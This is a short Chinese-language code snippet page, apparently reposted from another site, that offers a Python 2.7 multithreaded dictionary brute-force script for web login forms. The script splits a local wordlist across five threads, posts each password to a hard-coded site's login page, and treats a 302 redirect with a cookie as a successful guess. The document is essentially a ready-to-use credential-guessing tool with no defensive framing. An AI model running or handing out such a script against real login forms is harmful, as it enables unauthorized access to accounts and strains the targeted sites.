简单多线程字典暴力破解web表单，暴力破解web表单,python 2.73通

简单多线程字典暴力破解web表单，暴力破解web表单,python 2.73通

python 2.73

通过观察返回的cookie判断是否成功

需要在同目录指定一个字典文件

#!/usr/bin/env python#-*-coding=utf-8-*-#fuck web表单passwordimport threadingimport httplibimport urllibclass MyThread(threading.Thread):    def __init__(self, data):        threading.Thread.__init__(self)        self.lines = data    def run(self):        for password in self.lines:            try:                params = urllib.urlencode({'username':'username', 'password':password.rstrip()})                headers = {"Content-type":"application/x-www-form-urlencoded", "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"}                httpClient = httplib.HTTPConnection("www.baidu.com", 80, timeout=30)                httpClient.request("POST", "/index.php", params, headers)                response = httpClient.getresponse()                #    print response.status                #    print response.reason                #    print response.read()                #    print params, response.status, response.reason                if response.status == 302:                    headers =  response.getheaders()                             #print headers[1]                    print self.name, params, response.status, response.reason ,headers[1]            except Exception, e:                print e            finally:                if httpClient:                    httpClient.close()if __name__ == "__main__":    file = open('wordlist.txt')    lines = []    for line in file:                lines.append(line)    file.close()    n = 5 #默认五个线程    print len(lines)    block = len(lines)/n    for i in range(0, n):        if i == n:            data = lines[block*i:]        else:            data = lines[i*block:(i+1)*block]        thread = MyThread(data)        thread.start()#该片段来自于http://byrx.net